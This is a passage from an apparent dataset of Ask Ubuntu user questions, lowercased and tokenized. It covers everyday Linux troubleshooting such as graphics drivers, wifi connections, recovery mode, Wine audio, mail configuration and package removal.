00000030 0 0000002f 15 0000002e 0 0000002d 0 0000002c 15 0000002b 0 0000002a 0 00000029 0 00000028 0 00000027 0 00000026 0 < == system information : wine build : wine-1.5.26 platform : i386 ( wow64 ) host system : linux host version : 3.5.0-26-generic is there a solution to this problem ? how do i make either linux or my 3d-applications realize that there 's more dedicated video memory available for my hd6970 ? are there appropriate commands for this kind of issues , or are there other applications much like wine/ playonlinux that may utilize my applications and full memory better ? ubuntu showing only 256mb of vram when it should be 1gb max vram supported by open source ati radeon thanks in advance raklรถdder
272085	blinking cursor after `` enable networking '' in recovery mode and unable to do anything else .	after hitting `` yes '' on `` do you wish to continue ? '' i get fsck from util-linux 2.20.1 /dev/sda1 : clean , 166400/2444624 files , 906859/9765755 blocks with a blinking cursor on the line below it . from here , the only thing i can do is power off and start up again , and i 'm still in read-only mode . background : i 'm using a toshiba portege r100 , a laptop that lacks a cd drive and ca n't boot from a usb stick . i removed the r100 's hard disc , plugged it into a mac ( over usb ) that was in `` try ubuntu '' mode using a dvd , and then i installed ubuntu onto the r100 's hard disk . with the hard disk back in the r100 , on start-up , after the grub menu , with ubuntu selected , it displays the ubuntu logo then goes into `` low-graphics mode , '' covered here : how to fix `` the system is running in low-graphics mode '' error ? in attempting to try the various fixes reported there , i have to use recovery mode , which leaves the disk , by default , in read-only mode . and that 's where i try `` enable networking , '' which results in the blinking cursor ( crash ? ) . i have also tried dropping to the shell and trying # mount -o rw , remount / which is the fix here , http : //ubuntuforums.org/showthread.php ? t=1870817 but that does n't work . i just get a new prompt , as if i entered a return , and the system remains read-only .
272088	graphics issues after update	12.04 , lts yesterday morning i ran suggested updates . after doing so i had these problems : after about one minute , the screen will flash , sometimes more than once , then the launcher and system menu will vanish , leaving only the desktop visible . sometimes the screen will the revert back to showing the launcher , and/or flip back and forth between the two modes before stopping . whichever mode it ends up in , the mouse cursor still responds to mouse movements , but the mouse buttons do nothing , and the keyboard does not respond . i can do nothing except restart the machine using the power switch . after a lot of experimenting , i discovered that by starting in recovery mode , the system would come up as 1600 x1200 `` laptop '' rather than the previous 1920 x1080 `` samsung 22 '' that had been in use . as long as i start the system this way , it apparently works ok. booting as normal then altering the screen resolution to 1600 x1200 ( quickly , before the first minute or so is up ) does not help - it still dies as before . booting in recovery mode does not give me the option to change the resolution to anything other than the one used by recovery mode . so this problem , which occured immediately after an update , appears to be related to the graphics driver . i have attached the last section of /var/log/apt/history.log ( re-formatteded for human readbility ) but i do n't see anything in there that suggests to me that it would effect the graphics in this way . i would have to dig to find out exactly what graphics card i 'm using . nothing special , just whatever cheap card came with the pc , and i 'm sure i never installed any special driver for it . i 'd sure like to be able to just boot without going into recovery mode first , and i 'd sure like to have my accustomed resolution back . if anyone can tell me 1 ) which of these update is likely to have done this , and 2 ) how to revert back to the prevcious version i 'd appreciate it . thanks start-date : 2013-03-23 09:08:58 commandline : aptdaemon role='role-commit-packages ' sender=':1.71' install : linux-headers-3.2.0-39-generic : amd64 ( 3.2.0-39.62 ) , linux-headers-3.2.0-39 : amd64 ( 3.2.0-39.62 ) , linux-image-3.2.0-39-generic : amd64 ( 3.2.0-39.62 ) upgrade : libsmbclient : amd64 ( 3.6.3-2ubuntu2.3 , 3.6.3-2ubuntu2.4 ) , dmsetup : amd64 ( 1.02.48-4ubuntu7.1 , 1.02.48-4ubuntu7.2 ) , apt-transport-https : amd64 ( 0.8.16~exp12ubuntu10.7 , 0.8.16~exp12ubuntu10.10 ) , nautilus : amd64 ( 3.4.2-0ubuntu6 , 3.4.2-0ubuntu7 ) , libnss3 : amd64 ( 3.14.1-0ckbi1.93ubuntu.0.12.04.1 , 3.14.3-0ubuntu0.12.04.1 ) , usbmuxd : amd64 ( 1.0.7-2 , 1.0.7-2ubuntu0.1 ) , libgudev-1.0-0 : amd64 ( 175-0ubuntu9.2 , 175-0ubuntu9.3 ) , network-manager-gnome : amd64 ( 0.9.4.1-0ubuntu2 , 0.9.4.1-0ubuntu2.1 ) , smbclient : amd64 ( 3.6.3-2ubuntu2.3 , 3.6.3-2ubuntu2.4 ) , thunderbird-locale-en-us : amd64 ( 17.0.3+build1-0ubuntu0.12.04.1 , 17.0.4+build1-0ubuntu0.12.04.1 ) , gstreamer0.10-plugins-good-dbg : amd64 ( 0.10.31-1ubuntu1.1 , 0.10.31-1ubuntu1.2 ) , libnm-gtk0 : amd64 ( 0.9.4.1-0ubuntu2 , 0.9.4.1-0ubuntu2.1 ) , bamfdaemon : amd64 ( 0.2.124.2-0ubuntu1 , 0.2.126-0ubuntu1 ) , gstreamer0.10-plugins-good-doc : amd64 ( 0.10.31-1ubuntu1.1 , 0.10.31-1ubuntu1.2 ) , perl : amd64 ( 5.14.2-6ubuntu2.2 , 5.14.2-6ubuntu2.3 ) , libevince3-3 : amd64 ( 3.4.0-0ubuntu1.5 , 3.4.0-0ubuntu1.6 ) , thunderbird : amd64 ( 17.0.3+build1-0ubuntu0.12.04.1 , 17.0.4+build1-0ubuntu0.12.04.1 ) , gstreamer0.10-gconf : amd64 ( 0.10.31-1ubuntu1.1 , 0.10.31-1ubuntu1.2 ) , libdevmapper1.02.1 : amd64 ( 1.02.48-4ubuntu7.1 , 1.02.48-4ubuntu7.2 ) , linux-generic : amd64 ( 3.2.0.38.46 , 3.2.0.39.47 ) , libwbclient0 : amd64 ( 3.6.3-2ubuntu2.3 , 3.6.3-2ubuntu2.4 ) , perl-base : amd64 ( 5.14.2-6ubuntu2.2 , 5.14.2-6ubuntu2.3 ) , libnspr4-0d : amd64 ( 4.9.4-0ubuntu0.12.04.1 , 4.9.5-0ubuntu0.12.04.1 ) , perl-modules : amd64 ( 5.14.2-6ubuntu2.2 , 5.14.2-6ubuntu2.3 ) , libapt-inst1.4 : amd64 ( 0.8.16~exp12ubuntu10.7 , 0.8.16~exp12ubuntu10.10 ) , libpam-smbpass : amd64 ( 3.6.3-2ubuntu2.3 , 3.6.3-2ubuntu2.4 ) , gstreamer0.10-plugins-good : amd64 ( 0.10.31-1ubuntu1.1 , 0.10.31-1ubuntu1.2 ) , apt-utils : amd64 ( 0.8.16~exp12ubuntu10.7 , 0.8.16~exp12ubuntu10.10 ) , samba-common : amd64 ( 3.6.3-2ubuntu2.3 , 3.6.3-2ubuntu2.4 ) , udev : amd64 ( 175-0ubuntu9.2 , 175-0ubuntu9.3 ) , apt : amd64 ( 0.8.16~exp12ubuntu10.7 , 0.8.16~exp12ubuntu10.10 ) , libnm-gtk-common : amd64 ( 0.9.4.1-0ubuntu2 , 0.9.4.1-0ubuntu2.1 ) , evince-common : amd64 ( 3.4.0-0ubuntu1.5 , 3.4.0-0ubuntu1.6 ) , linux-headers-generic : amd64 ( 3.2.0.38.46 , 3.2.0.39.47 ) , linux-image-generic : amd64 ( 3.2.0.38.46 , 3.2.0.39.47 ) , evince : amd64 ( 3.4.0-0ubuntu1.5 , 3.4.0-0ubuntu1.6 ) , libapt-pkg4.12 : amd64 ( 0.8.16~exp12ubuntu10.7 , 0.8.16~exp12ubuntu10.10 ) , libdevmapper-event1.02.1 : amd64 ( 1.02.48-4ubuntu7.1 , 1.02.48-4ubuntu7.2 ) , flashplugin-installer : amd64 ( 11.2.202.273ubuntu0.12.04.1 , 11.2.202.275ubuntu0.12.04.1 ) , samba : amd64 ( 3.6.3-2ubuntu2.3 , 3.6.3-2ubuntu2.4 ) , gstreamer0.10-pulseaudio : amd64 ( 0.10.31-1ubuntu1.1 , 0.10.31-1ubuntu1.2 ) , libnspr4 : amd64 ( 4.9.4-0ubuntu0.12.04.1 , 4.9.5-0ubuntu0.12.04.1 ) , nautilus-data : amd64 ( 3.4.2-0ubuntu6 , 3.4.2-0ubuntu7 ) , liblvm2app2.2 : amd64 ( 2.02.66-4ubuntu7.1 , 2.02.66-4ubuntu7.2 ) , gir1.2-gudev-1.0 : amd64 ( 175-0ubuntu9.2 , 175-0ubuntu9.3 ) , libusbmuxd1 : amd64 ( 1.0.7-2 , 1.0.7-2ubuntu0.1 ) , libperl5.14 : amd64 ( 5.14.2-6ubuntu2.2 , 5.14.2-6ubuntu2.3 ) , libudev0 : amd64 ( 175-0ubuntu9.2 , 175-0ubuntu9.3 ) , thunderbird-globalmenu : amd64 ( 17.0.3+build1-0ubuntu0.12.04.1 , 17.0.4+build1-0ubuntu0.12.04.1 ) , thunderbird-gnome-support : amd64 ( 17.0.3+build1-0ubuntu0.12.04.1 , 17.0.4+build1-0ubuntu0.12.04.1 ) , linux-libc-dev : amd64 ( 3.2.0-38.61 , 3.2.0-39.62 ) , samba-common-bin : amd64 ( 3.6.3-2ubuntu2.3 , 3.6.3-2ubuntu2.4 ) , libnautilus-extension1a : amd64 ( 3.4.2-0ubuntu6 , 3.4.2-0ubuntu7 ) , iptables : amd64 ( 1.4.12-1ubuntu4 , 1.4.12-1ubuntu5 ) , libbamf3-0 : amd64 ( 0.2.124.2-0ubuntu1 , 0.2.126-0ubuntu1 ) , libnss3-1d : amd64 ( 3.14.1-0ckbi1.93ubuntu.0.12.04.1 , 3.14.3-0ubuntu0.12.04.1 ) , libbamf0 : amd64 ( 0.2.124.2-0ubuntu1 , 0.2.126-0ubuntu1 ) , thunderbird-locale-en : amd64 ( 17.0.3+build1-0ubuntu0.12.04.1 , 17.0.4+build1-0ubuntu0.12.04.1 ) end-date : 2013-03-23 09:12:14
272094	ubuntu 12.10 recognizes wireless but no internet connection	can anyone help me with this ? i have ubuntu 12.10 installed and it is even connected to my wifi but i am unable to go to any web pages in firefox . edit : eth0 link encap : ethernet hwaddr 00:1e:8c:41:5a : fb up broadcast multicast mtu:1500 metric:1 rx packets:0 errors:0 dropped:0 overruns:0 frame:0 tx packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:0 ( 0.0 b ) tx bytes:0 ( 0.0 b ) interrupt:18 lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:16436 metric:1 rx packets:286 errors:0 dropped:0 overruns:0 frame:0 tx packets:286 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:25004 ( 25.0 kb ) tx bytes:25004 ( 25.0 kb ) wlan0 link encap : ethernet hwaddr f0:7d:68 : c1 : a7 : a8 inet addr:10.0.0.12 bcast:10.0.0.255 mask:255.255.255.0 inet6 addr : fe80 : :f27d:68ff : fec1 : a7a8/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:230 errors:0 dropped:0 overruns:0 frame:0 tx packets:283 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:27761 ( 27.7 kb ) tx bytes:28587 ( 28.5 kb ) wlan1 link encap : ethernet hwaddr 00:25:9c:03:5a : b7 up broadcast multicast mtu:1500 metric:1 rx packets:0 errors:0 dropped:0 overruns:0 frame:0 tx packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:0 ( 0.0 b ) tx bytes:0 ( 0.0 b ) ping -c5 8.8.8.8 ping 8.8.8.8 ( 8.8.8.8 ) 56 ( 84 ) bytes of data . from 10.0.0.12 icmp_seq=1 destination host unreachable from 10.0.0.12 icmp_seq=2 destination host unreachable from 10.0.0.12 icmp_seq=3 destination host unreachable from 10.0.0.12 icmp_seq=4 destination host unreachable from 10.0.0.12 icmp_seq=5 destination host unreachable -- - 8.8.8.8 ping statistics -- - 5 packets transmitted , 0 received , +5 errors , 100 % packet loss , time 3999ms pipe 3 iwconfig wlan1 ieee 802.11abgn essid : off/any mode : managed access point : not-associated tx-power=27 dbm retry long limit:7 rts thr : off fragment thr : off power management : on eth0 no wireless extensions . lo no wireless extensions . wlan0 ieee 802.11bgn essid : '' thepenismighter '' mode : managed frequency:2.412 ghz access point : 00:1d : d6:17 : f4:30 bit rate=1 mb/s tx-power=27 dbm retry long limit:7 rts thr : off fragment thr : off power management : off link quality=45/70 signal level=-65 dbm rx invalid nwid:0 rx invalid crypt:0 rx invalid frag:0 tx excessive retries:17 invalid misc:6 missed beacon:0
272102	need to know what program is writing to the console on start , logout and shutdown	i would like to know what program is responsible for writing messages to the console during the start , logout and shutdown process . what i 'm referring to is that black console that comes out and spews forth ugly messages on the screen . is it init ? under normal circumstances the console messages will not show on start . however it is almost always there on shutdown . on several occasions it also shows when i try to logout of a current session . thanks ! : )
272105	ati raedon 68e1 binary drivers not working in ubuntu 10.04	i was using the amdcccle to set the graphical settings provided by the ati graphics card , both fglrx and fglrx-amdcccle was installed by default . then i followed the ubuntu community i.e https : //help.ubuntu.com/community/binarydriverhowto/ati link and tried to install the binarydriver , but after installing this binary driver i couldnot open the amdcccle window , it gives error and says proper driver was not installed for the graphics card . then i uninstalled this binary driver and again tried to install the fglrx and fglrx-amdccle from the ubuntu repositories . but even after installation i couldnot run aticonfig -- initial it gives command not found -- aticonfig and fglrxinfo it gives command not found - fglrxinfo according to the link it should work but i am stuck because of this error and my graphics card is not working . i am out of options and searching for ati hd 68e1 driver and even cant get the exactly named driver . please help me out of this .
272106	brightness and touchpad issues on an acer aspire 725	i have an acer aspire one 725 running ubuntu 12.04 lts , and it flashes the screen when not charging . the same happens when i want to change the brightness of the screen ( whether or not connected to a power source ) .no serious problems , but it is annoying . when using windows 7 , never such problems occurred . another thing , the touchpad crashes if i do not start to turn on the netbook . i explain : when i 'm loging in , turned on the computer after i activate my touchpad religiously , before entering my session , because otherwise i blocks the pc and i use a wireless mouse . in short , i have problems with my touchpad , and my screen brightness , and i can never make the touchpad is automatically activated . ps : this is a translation of google-translate because i speak spanish , and do not know much english . tengo una acer aspire one 725 corriendo con ubuntu 12.04 lts , y me parpadea la pantalla cuando no está cargando . lo mismo ocurre cuando quiero cambiarle el brillo a la pantalla ( esté o no esté conectada a una fuente de alimentación ) . no hay serios problems , pero es molesto . cuando usaba windows 7 , jamás ocurrió ese tipo de problemas . otra cosa , el touchpad se me bloquea si no lo inicio al prender la netbook . les explico : cuando estoy en el loging , tras haber prendido la computadora debo activar religiosamente mi touchpad , antes de entrar a mi sesión , porque de lo contrario se me bloquea la pc y debo usar un mouse inalámbrico . en resumen , tengo problemas con mi touchpad , y con mi brillo de pantalla , y nunca puedo hacer que el touchpad se active automáticamente . pd : estoy posteando una traducción del google-translate porque hablo español , y no sé mucho de inglés . saludos desde paraguay : )
272108	how do i run portable versions of apps on linux ?	sometimes i just want to try a software out without installing it onto my system . for example , i downloaded the bluegriffen software from here when i extract the tar.bz2 file , i have the bluegriffen folder with all the files . i am unsure which file to double click . i 've tried double clicking on bluegriffon bluegriffon-bin run-mozilla.sh but there 's no loading of the program . this is a very similar situation for when i download and want to try the latest firefox . the only program that has ever worked fine without installation is the the blender program how do i run software such as firefox and bluegriffen , which i download as archives and extracted , without having to install them ?
272116	configure 'mail ' command to send external email when servers domain name is used	i have postfix and mail installed on my server . the following command works fine $ mail aj @ xyz.com but if i use this command $ mail aj @ mydomain.com the system thinks i am trying to send a local email to the user 'aj ' . how can set mail to send emails to aj @ mydomain.com externally ? the output from /etc/mailname is $ cat /etc/mailname mydomain.com the output from /etc/mail.rc $ cat /etc/mail.rc set ask askcc append dot save crt ignore received message-id resent-message-id status mail-from return-path via delivered-to
272120	mac boot from ubuntu installed on a usb drive	i have a usb drive with ubuntu installed on it ( on a live usb , it actually has ubuntu installed on it ) , and it works seamlessly when i try to boot my pc from it . when i try to boot my mac ( mac book pro 15 '' 6,2 ) off of it , it would n't recognize it . i tried installing refit and refind on my mac but neither seemed to help . how can i make it work ? is there any other boot menu intended for usbs ? ( refit says on it 's website it does n't support usbs that great ) is there any way to manually program it ? it is really important for me . the usb drive is a san disk cruzer pop 8 gb .
272123	how to supervise a process and schedule a periodic restart ?	i run a process that sometime crash and sometime freeze . i used supervise to have it automatically restart when it crash . however , if it freeze , it stay frozen until i am back in front of the computer . i would like a tool that would restart it when it crash , but can also be configure to do periodic kill and restart , so if it freeze , it wo n't stay frozen more that a given period of time . which tool would who suggest ? thanks
272132	using both wired and wireless ubuntu 12.10 no bonding	i 've got an pc running ubuntu 12.10. i have 2 connection : a wired connect to the internet through router a , and the wireless connection to the internet through router b . now i have try to search the internet how to combine these two connections . first of all i have read about bonding solution , i 've tried it , but a problem happened : i can not control my two cards in the network manager , so i can not select which wireless network to connect to . the bonding is not a good solution . now i try to look for an easy solution with gui config but i found nothing appropriate to my need . thanks for all coming help .
272133	ubuntu 13.04 not able to connect to wifi	hi i have a dell inspiron laptop in which i have installed both windows 7 and ubuntu 13.04 . i am experiencing a problem in my office ie ; i am not able to connect to wifi in ubuntu in my office though i am able to connect to wifi in my home . i am not experiencing any problem on the windows side even all my office people are able to connect to wifi except me . please help me over come the problem .
272134	default application to open text file in thunar under awesome wm	i 'm on xubuntu 12.04 and using awesome wm . in awesome session , if i double click a plain text file ( txt , asc , rb , py etc . ) in thunar , it opens with abi word . but i want it to open with a text editor not a word processor . in xubuntu/xfce session , it does open with text editor ( leafpad ) . how could i fix it without setting it for various text files ?
272144	installing of microsoft acme web camera	how to install acme web camera from microsoft type installation disc on ubuntu11.10 ? i used wine to do it but without success . it shows error 1627 !
272146	desktop bigger then screen after nvidia drivers installed	i got problems with nvidia drivers , after i installed them and reboot my desktop is to big for my screen . i can only see some piece of the background .
272151	my ubuntu system is not wake-up automatically ?	i am using ubuntu 10.04 system . in that , i am trying to wake-up my system automatically at specific time.for that , i wrote a python script for wake-up automatically.the script was run perfectly and i was checked in this location /sys/class/rtc/rtc0/wakealaram.the wake-up time was successfully wrote in this wakealaram file . but the system is not waked-up at specified time . if you have any idea about this problem , let me.it is very useful to me .
272154	converting djvu to pdf trouble with this ocr preserving code	i want to convert djvu to pdf while preserving ocr . this page describes how to do so , but i am getting a blank html file . in /home/steven/documents/djvu2pdf/1/ , djvu2hocr -p 1 intro.djvu gives me : converting 'intro.djvu ' : < ? xml version= '' 1.0 '' encoding= '' utf-8 '' ? > < ! doctype html public `` -//w3c//dtd xhtml 1.0 transitional//en '' `` http : //www.w3.org/tr/xhtml1/dtd/xhtml1-transitional.dtd '' > < html xmlns= '' http : //www.w3.org/1999/xhtml '' > < head > < meta http-equiv= '' content-type '' content= '' text/html ; charset=utf-8 '' / > < meta name= '' ocr-system '' content= '' djvu2hocr 0.7.9 '' / > < meta name= '' ocr-capabilities '' content= '' ocr_carea ocr_page ocr_par ocrx_block ocrx_line ocrx_word '' / > < title > djvu hidden text layer < /title > < /head > < body > *** [ 1-11711 ] failed to open 'intro.djvu ' : no such file or directory . *** ( bytestream.cpp:693 ) *** 'djvu : :gutf8string djvu : :bytestream : :stdio : :init ( const djvu : :gurl & , const char* ) ' < /body > < /html > traceback ( most recent call last ) : file `` /usr/bin/djvu2hocr '' , line 7 , in < module > _.main ( sys.argv ) file `` /usr/share/ocrodjvu/lib/cli/djvu2hocr.py '' , line 325 , in main djvused.wait ( ) file `` /usr/share/ocrodjvu/lib/ipc.py '' , line 114 , in wait raise calledprocesserror ( return_code , self.__command ) subprocess.calledprocesserror : command 'djvused ' returned non-zero exit status 10 leading to a blank html file , so when i run sed 's/ocrx/ocr/g ' > pg1.html it just runs on an indefinite loop . i also have a secondary program called djvu2pdf which i found at http : //0x2a.at/s/projects/djvu2pdf , but djvu2pdf intro.djvu gives me -e error : /usr/bin/djvu2pdf : file 'intro.djvu ' not found the ocr file opens fine .
272161	alternative to chmod 777 in lamp	typically after installing lamp i like to install phpmyadmin and be allowed to drop folders in var/www/ . i run sudo chmod 777 only because the lamp is on a lan . i was curious to know what is the better alternative to sudo chmod 777 ? i do run as root but i ca n't seem to find anything that will be safe but still allow me to drop files or modify apache2.conf . my apologies if this has been asked before but i did n't see it from the searches . edit : i did learn how to use gksudo gedit /etc/apache2/apache2.conf and added include /etc/phpmyadmin/apache.conf on the last line . rebooted apache with sudo service apache2 restart . i dont see any security issues with using gksudo .
272173	iphone music sync ( ios 6.1.2 ) , is it possible yet ?	is it yet possible to synchronize music ? i know about questions like these : is it possible yet to synchronise music to an iphone running ios 5/6 ? iphone 4 ios 6 sync with ubuntu 12.04 is it possible yet ? seeing , both questions are ~3 months old .
272177	does anyone know how to wrap text in a cell in libreoffice calc ?	i am wondering how to wrap text in a single cell in libreoffice calc . does anyone know ?
272187	setting jdk 7 as default	four @ twenty : ~ $ file /etc/alternatives/java /etc/alternatives/javac /etc/alternatives/java : symbolic link to `/usr/lib/jvm/java-7-openjdk-amd64/jre/bin/java' /etc/alternatives/javac : symbolic link to `/usr/lib/jvm/java-6-openjdk-amd64/bin/javac' forgive my noobishness but im interpreting that as the runtime environment using java 7 but the compiler using 6 ? is this right and if so how can i set it to use 7 ? thanks : )
272189	open-source , free java decompiler	is there any open source java decompilers for ubuntu , preferably in the repositories and/or gpl'ed ? both jad and jd , the most popular decompilers i 've found after a bit of googling , seems to be available only in binary form . and they are both proprietary . it 's hard to believe there is no such software in ubuntu ( or linux in general ) . if there is more than one , which you recommend , and why ?
272194	alt key functionality broke in wine program after upgrade to 12.04	i upgraded to ubuntu 12.04 , and all alt key functionality is gone in this wine program i 've been using for years . the program is elderly , it came out back in 2005 , but it 's worked beautifully under wine for years . there 's no work-around for the lack of the alt key , and the lack renders the program almost unusable . i tried uninstalling and reinstalling the program itself and wine , but that did n't make any difference . any ideas ?
272196	distorted and sped up audio in wine 1.4 while using spotify on ubuntu 12.04	i have two applications that run through wine that will sometimes get horribly distorted and `` sped forward '' ( i can see in spotify that the files are played back much faster than they should be ) . i tested it today and was able to play music in spotify for a while , perhaps 15 minutes . i also tried to test audio in wine and that seemed fine , too . i started the other application and the sound was fine there too , for the most part : it was a little choppy sometimes which seemed to correlate with how rapidly i changed between audio tracks . in spotify , though the sound was mostly fine , there was some small hiccups with the playback sometimes , but i do n't know if that is a symptom of the overarching problem with wine . after a while spotify began to ouput audio that was distorted and sped-forward . it was pretty consistent ; sometimes it would return to normal , but for the most part it was just useless . the other application and wine-config audio testoutputted horrible audio , too . driver used : winealsa.drv .
272197	grub `` no such partition error ''	i have a dual booted windows/linux computer . today when i turn it on , it says : error : no such partition . grubrescue > what do i do ?
272199	can not click on anything when using unity 3d	when i try to use unity 3d , i ca n't click on anything . ca n't drag and drop windows , ca n't focus on inputs etc . using unity 2d works fine . i have a nvidia gtx 660 ti and the nvidia drivers are installed . any ideas of why this happens ?
272200	on 12.10 & 13.04 with i915 detected a hung gpu , disabling acceleration	my system has been stable for about 3 months then without warning i started to get a freeze of the display and then a problem report saying gpu hung . i have update the graphics driver as per how to install intel 82852/855gm driver ? so i know that i have the latest driver available but i still keep getting , and reporting , regular gpu hang messages . now every now and then the screen freezes in a big way and i can only proceed by ssh in from a separate machine and killing off lightdm and then restarting it and logging in again . if anyone has fixed this problem it would be good to know the solution .
272207	how to delete a folder from ubuntu one ?	i would like to delete a folder in the ubuntu one menu . i deleted the folder in my computer , but the folder still appears in the tab folders ubuntu one . how to remove the folder completely ?
272209	cairo-dock has problem with lubuntu	cairo-dock visual performance is poor in lubuntu . my desktop suffers with black background when i navigate my mouse pointer on cairo dock . what is causing this and how can i fix it ?
272211	migrate outlook 2013 to thunderbird	i am considering to move away from windows to ubuntu . at present trying to migrate my emails from office 2013 to thunderbird with no success . most importantly is my my personal folder ( pst ) with all the historical data of the last 5years that i can not loose . please help
272213	upgrade from 10.10 to 11.04 on dell latitude 430	i can upgrade to a later version . the upgrade process stops before starts to get the packagings . says 'network error ' however the network works fine on the machine ! ? help pls ! !
272214	how to optimize whole folder with jpegtran ?	back in windows i would use jpegtran program to process all of the images in a folder . however , there does n't seem to be an application in ubuntu with ui for performing the same task . obviously , i should do it from the terminal , but i have no idea how to perform a losless batch operation . all of the tutorials mention cropping etc. , but i do n't need those operations . therefore , my question is : what should i type in the terminal to perform losless optimization ( i. e. only strip meta data i guess ) of the folder with images ( e. g. `` examplefolder ) . thank you in advance !
272215	seeing apt-get changelogs for to-be-upgraded packages	this question describes how to get the changelog for a given package . however , it 's the whole changelog . what i 'd like is a way to see what 's changed in whatever i 'm about to upgrade . for example , i was imagining something like : $ sudo apt-get upgrade -- show-changelogs reading package lists ... done building dependency tree reading state information ... done calculating upgrade ... done the following packages will be upgraded : foo -- adds the bar feature for better snazziness -- removes the deprecated baz feature 1 upgraded , 0 newly installed , 0 to remove and 0 not upgraded . need to get 8,864 kb of archives . after this operation , 285 kb disk space will be freed . do you want to continue [ y/n ] ? unfortunately , i do n't see anything like that in the man pages for apt-get . does this or something similar exist ?
272219	create_admin aborted ! undefined method `source_index ' for gem : module	trying to get gitorious running.. i got undefined method `source_index ' for gem : module from env rails_env=production ruby1.8 script/create_admin when i run : env rails_env=production ruby-1.8.7-p371 script/create_admin i got : note : gem.source_index is deprecated , use specification . it will be removed on or after 2011-11-01 . gem.source_index called from /usr/local/rvm/gems/ruby-1.8.7-p371/gems/rails- 2.3.18/lib/rails/gem_dependency.rb:21 . for the full stack trace , please look here and here .
272220	batch tesseract conversion	i am trying to ocr a book using tesseract however i do not want to type each individual page as it is a book near 1000 pages . how would i accomplish this i tried tesseract *.tif * which gives me this read_params_file : parameter not found : ii*
272221	how to configure which notifications are skipped in xfce4-notifyd ( lubuntu 12.10 ) ?	i have accidentally clicked on `` hide this notification '' / `` do not show this message again '' button in osd notification system in lubuntu 12.10 , namely xfce4-notifyd . the information was about wireless network being connected ( i still have notification of being disconnected from wifi ) from network applet . i can configure style of notification with xfce4-notifyd-config , how to configure which notifications are shown and which are not ?
272223	ca n't mount internal hdd in ubuntu 8.10	$ logfile indicates unclean shutdown ( 0,0 ) failed to mount'/dev/sda1 ' : operation not supported mount is denied becouse ntfs is marked to be in use .
272224	how to get your network ip	i am on a network with pppoe connection for internet acces.i want to find out my network ipv4 . example : -on windows 7 i can see both my pppoe 's connection ip and local network ip , either from properties of the connection , either from cmd with ipconfig command -on ubuntu i can only see the pppoe 's ip i cam across this problem after trying to lookup another ubuntu pc on the network . how can i check my local area connection ( windows terms ) ip and/or how to see the other ubuntu pc from my network ? if i connect to my dsl account i can see my ip ( ipv4 and 6 ) from my dsl connection but not my eth0 ip . if i connect to my wired connection i can see my ip from my eth0 connection but after that i can not connect to the internet . i can not have both ?
272227	how to remove tuxcut app from ubuntu 12.04	i 've installed tuxcut but it 's in different language . i 've tried removing it using dpkg but did n't worked so i downloaded a english version and tried installing it.but i got this error . any help to remove that arabic tuxcut.. ? ? cybercam @ cybercam : ~/downloads $ sudo dpkg -i tuxcut_5.0_all.deb ( reading database ... 176367 files and directories currently installed . ) preparing to replace tuxcut 5.0 ( using tuxcut_5.0_all.deb ) ... rm : can not remove `/usr/bin/run-tuxcut ' : no such file or directory dpkg : warning : subprocess old pre-removal script returned error exit status 1 dpkg - trying script from the new package instead ... rm : can not remove `/usr/bin/run-tuxcut ' : no such file or directory dpkg : error processing tuxcut_5.0_all.deb ( -- install ) : subprocess new pre-removal script returned error exit status 1 errors were encountered while processing : tuxcut_5.0_all.deb tuxcut is running @ 'python ' opt/tuxcut/run.py.i 'm a newbie , so a bit of help needed .
272228	problem sourcing variables inside upstart	i 'm trying to use the variables defined in /etc/environment in an upstart script running on 12.04 . i 'm able to export the variable to the child process but for some reason i not able to use them in the upstart script stanza itself . this works : script . /etc/environment export node_env # node is able to read the node_env , wonderful ! /usr/local/bin/node /path/to/app/app.js end script but if i try to introduce some conditional logic within the stanza then it will fail : script . /etc/environment export node_env # $ { node_env } is not set inside the stanza if [ [ $ { node_env } = 'production ' ] ] ; then # this will never run /usr/local/bin/node /path/to/app/app.js fi end script any ideas how i can access variables from sourced files inside the stanzas ?
272234	broken links inside linux header file folder	i installed the linux header file for my kernel using command : sudo apt-get install linux-headers-`uname -r` in the folder /usr/src/linux-headers-2.6.32-21-generic all the files have broken links . example : the file linux-headers-2.6.32-21/crypto has broken link points to ../linux-headers-2.6.32-21/crypto . output of ls -l /usr/src/linux-headers-2.6.32-21-generic : drwxr-xr-x 3 root root 4096 2013-03-25 18:39 arch lrwxrwxrwx 1 root root 32 2013-03-25 18:39 block - > ../linux-headers-2.6.32- 21/block lrwxrwxrwx 1 root root 33 2013-03-25 18:39 crypto - > ../linux-headers-2.6.32-21/crypto lrwxrwxrwx 1 root root 40 2013-03-25 18:39 documentation - > ../linux-headers-2.6.32-21/documentation lrwxrwxrwx 1 root root 34 2013-03-25 18:39 drivers - > ../linux-headers-2.6.32-21/drivers lrwxrwxrwx 1 root root 35 2013-03-25 18:39 firmware - > ../linux-headers-2.6.32-21/firmware lrwxrwxrwx 1 root root 29 2013-03-25 18:39 fs - > ../linux-headers-2.6.32-21/fs drwxr-xr-x 5 root root 4096 2013-03-25 18:39 include lrwxrwxrwx 1 root root 31 2013-03-25 18:39 init - > ../linux-headers-2.6.32-21/init lrwxrwxrwx 1 root root 30 2013-03-25 18:39 ipc - > ../linux-headers-2.6.32-21/ipc lrwxrwxrwx 1 root root 33 2013-03-25 18:39 kbuild - > ../linux-headers-2.6.32-21/kbuild drwxr-xr-x 2 root root 4096 2013-03-25 18:39 kernel lrwxrwxrwx 1 root root 30 2013-03-25 18:39 lib - > ../linux-headers-2.6.32-21/lib lrwxrwxrwx 1 root root 35 2013-03-25 18:39 makefile - > ../linux-headers-2.6.32-21/makefile lrwxrwxrwx 1 root root 29 2013-03-25 18:39 mm - > ../linux-headers-2.6.32-21/mm -rw-r -- r -- 1 root root 640617 2010-04-16 18:37 module.symvers lrwxrwxrwx 1 root root 30 2013-03-25 18:39 net - > ../linux-headers-2.6.32-21/net lrwxrwxrwx 1 root root 34 2013-03-25 18:39 samples - > ../linux-headers-2.6.32-21/samples drwxr-xr-x 7 root root 4096 2013-03-25 18:39 scripts lrwxrwxrwx 1 root root 35 2013-03-25 18:39 security - > ../linux-headers-2.6.32-21/security lrwxrwxrwx 1 root root 32 2013-03-25 